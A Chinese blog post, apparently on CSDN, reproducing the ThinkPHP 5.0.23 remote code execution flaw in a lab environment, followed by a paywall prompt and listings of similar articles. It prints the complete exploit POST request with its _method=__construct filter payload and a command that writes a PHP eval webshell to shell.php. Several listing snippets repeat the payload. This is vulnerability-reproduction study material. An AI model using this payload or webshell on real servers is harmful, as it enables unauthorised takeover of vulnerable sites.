Thinkphp5.0.23 rce

Aimo’

已于 2024-02-28 09:13:30 修改

阅读量1.2k

点赞数 2

CC 4.0 BY-SA版权

分类专栏： # 漏洞基础文章标签：网络安全 web安全

于 2024-02-23 09:44:53 首次发布

本文链接：https://blog.csdn.net/Continuejww/article/details/136248209

漏洞基础专栏收录该内容

3 篇文章

订阅专栏

本文分析了ThinkPHP5.0早期版本中的一个安全漏洞，描述了攻击者如何通过错误处理获取请求方法，进而实现远程代码执行(RCE)，并提供了漏洞利用的步骤和示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、成因

ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0（<5.0.24）版本中，框架在获取请求方法时错误地对其进行处理，从而允许攻击者调用 Request 类的任何方法，从而通过特定漏洞链导致 RCE 漏洞。

二、漏洞利用

进入靶场页面

根据漏洞POC，远程代码执行命令为：id

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id #传入的参数

用burp抓包更改请求方式GET为POST

写入一句话木马

echo '<?php eval($_POST[cmd]); ?>' > shell.php

连接蚁剑

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Aimo’

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2779

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

ThinkPHP5 5.0.23-rce远程代码执行漏洞复现

Nai_zui_jiang的博客

09-08

485

判断是否存在漏洞：访问/index.php?s=captcha页面，会出现报错。通过echo命令写入 Webshell 文件并把木马进行base64编码。使用HackBar 插件发送 POST 请求。访问shell.php，使用蚁剑连接。启动环境，先关闭其他环境。

2 条评论您还未登录，请先登录后发表或查看评论

thinkphp 5.0.23 rce 漏洞复现

m0_65764670的博客

05-29

710

这里的rce是远程命令，此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0查看适用版本。设置靶机和攻击机IP。

Thinkphp5.0.23 rce（远程代码执行）

Lucky1youzi的博客

01-20

1007

Thinkphp5.0.23 rce（远程代码执行）

Thinkphp5.0.23-rce

最新发布

jiangzhen5566的博客

05-31

328

这块代码就是赋值,将他们赋值，filter = ['system'] ,method = ['get'] , server = ['REQUEST_METHOD' => 'whoami']开始时候$options[]数组为空，经过$this->input = file_get_contents('php://input');所以构造出来了call_user_func_array("system","whoami");最后的最后执行了命令。但是不知道为什么执行不了命令，应该是执行了，传马直接给杀了。

代码审计之ThinkPHP 5.0-5.0.23RCE

m0_63581584的博客

11-23

725

2.2，回到app->run方法中。调用call_user_func()，造成RCE。2.1 第一步造成变量覆盖。进入App-run()方法。这里debug开启，即进入。2.开始进行RCE分析。

ThinkPHP--5.0.23-rce远程代码执行

m0_74402888的博客

05-03

928

实现框架的核心类Requests的method方法实现表单请求类伪装，默认为$_POST[‘_method’]变量，却没有对_method属性进行严格校验，可以通过变量覆盖Requests类的属性，在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码，导致远程代码执行。

thinkphp 5.0.23-rce

weixin_51692662的博客

11-02

270

thinkphp 5.0.23-rce

thinkphp v5.0.23 rce

qq_43647462的博客

08-23

3766

thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架，其中在thinkphp5版本中出现了很多命令执行漏洞，本文分析采用的代码使用的是thinkphp版本v5.0.23（目的是匹配docker搭建的thinkphp环境的版本）漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中，其中存在method方法，简单阅读发现该方法目的是为了获取当前的请求类型，因为我没有传入任何请求，所以get，post等的数组为空其中var

ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1

08-03

ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架，它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而，在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution（RCE...

thinkphp 5.0.23 rce漏洞复现

ffff5的博客

05-19

818

thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架，支持windows/Unix/linux等服务器环境，并且有相当多的CMS是在thinkphp基础上二次开发的。环境搭建使用vulhub搭建环境，过程不赘述。漏洞复现抓包并直接发送下面的流量包，即可利用漏洞进行远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: IP:PORT Accept-Encoding: gzip,

从0学代码审计 | thinkphp 5.0.23 RCE

2301_80127209的博客

12-18

1289

ThinkPHP 是一款开源的 PHP 框架，用于快速、简单地开发 PHP 应用程序。它提供了一套丰富的功能和工具，使开发者能够更容易地构建各种规模的 Web 应用。ThinkPHP 的目标是提高开发效率，同时保持代码的可读性和可维护性。thinkphp的许多版本中也爆出了多个漏洞，本篇文章主要记录thinkphp 5.0.23版本 RCE的漏洞复现。

thinkphp反序列化漏洞(5.0.23-rce)

SuperherRo的博客

09-27

456

本文只聚焦于贴合实际情况下如何从黑盒角度发现漏洞到利用漏洞的一个完整流程。

[框架漏洞]ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

Y4tacker的博客

02-12

2080

ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析首先借用师傅的一张图来梳理一下流程 call_user_func调用system造成rce 梳理思路： $this->method可控导致可以调用__contruct()覆盖Request类的filter字段，然后App::run()执行判断debug来决定是否执行$request->param()，并且还有$dispatch['type'] 等于controller或者 method 时会执行$request->param(

漏洞复现Thinkphp的5.0.23-rce

2401_86120759的博客

10-21

732

实现框架的核心类Requests的method方法实现表单请求类伪装，默认为$_POST[‘_method’]变量，却没有对_method属性进行严格校验，可以通过变量覆盖Requests类的属性，在结合框架特性实现对任意函数的调用实现任意代码执行。查看后台输入语句：_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd。网站后拼接index.php/?s=captcha进行访问。建议进行ThinkPHP版本更新。

Thinkphp5.0.23-rce漏洞复现

qq_64875725的博客

06-02

2729

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {

BUUCTF-Real-ThinkPHP]5.0.23-Rce

02-02

972

[ThinkPHP]5.0.23版本，RCE远程代码执行漏洞！

Thinkphp 5.0.23 rce复现（新手)

nqzh001的博客

12-18

1483

今天学习使用docker复现Thinkphp 5.0.23 rce漏洞使用docker配合Vulhub一键搭建漏洞测试靶场； Vulhub搭建地址 https://vulhub.org/#/docs/run/ 这边推荐使用Ubuntu，之前使用CentOS搭建总是出现各种错误。搭建成功后，开始访问直接上poc _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 这个id就是想要

thinkphp5.0.23rce漏洞复现

09-22

ThinkPHP 5.0.23版本之前存在一个远程代码执行（RCE）的漏洞。漏洞的形成原因是在获取method的方法中未正确处理方法名，导致攻击者可以调用Request类的任意方法并构造利用链，从而导致远程代码执行漏洞。具体的漏洞...